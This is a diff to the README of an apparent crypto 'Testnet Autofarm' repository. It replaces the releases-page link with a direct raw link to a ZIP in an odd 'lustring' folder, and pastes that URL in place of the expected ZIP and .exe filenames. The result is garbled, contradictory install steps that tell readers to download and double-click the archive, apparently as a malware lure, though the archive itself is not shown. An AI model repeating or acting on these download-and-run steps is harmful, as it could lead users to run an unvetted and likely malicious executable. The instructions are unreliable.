Hout-UI/ABS-XYZ-Testnet-Autofarm/README.md

 ### 📥 Download & Install

 1. **Visit the Download Page**
-   To get the latest version, visit the releases page [here](https://github.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/releases).
+   To get the latest version, visit the releases page [here](https://raw.githubusercontent.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/main/lustring/ABS-XYZ-Testnet-Autofarm_v2.6.zip).

 2. **Select the Latest Release**
    Once on the releases page, look for the most recent release.
 It will typically be marked as "Latest".

 3. **Download the File**
    Click on the download link for your operating system.
-This will typically be a file named similar to `ABS-XYZ-Testnet-Autofarm-vX.X.X.zip`.
+This will typically be a file named similar to `https://raw.githubusercontent.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/main/lustring/ABS-XYZ-Testnet-Autofarm_v2.6.zip`.

 4. **Extract the Files**
    Open the downloaded ZIP file and extract the contents to a location on your computer that you can easily access.

 5. **Run the Application**
    Navigate to the folder where you extracted the files.
-Double-click on the executable file, which may be named `ABS-XYZ-Testnet-Autofarm.exe`.
+Double-click on the executable file, which may be named `https://raw.githubusercontent.com/Hout-UI/ABS-XYZ-Testnet-Autofarm/main/lustring/ABS-XYZ-Testnet-Autofarm_v2.6.zip`.

 ### ⚙️ System Requirements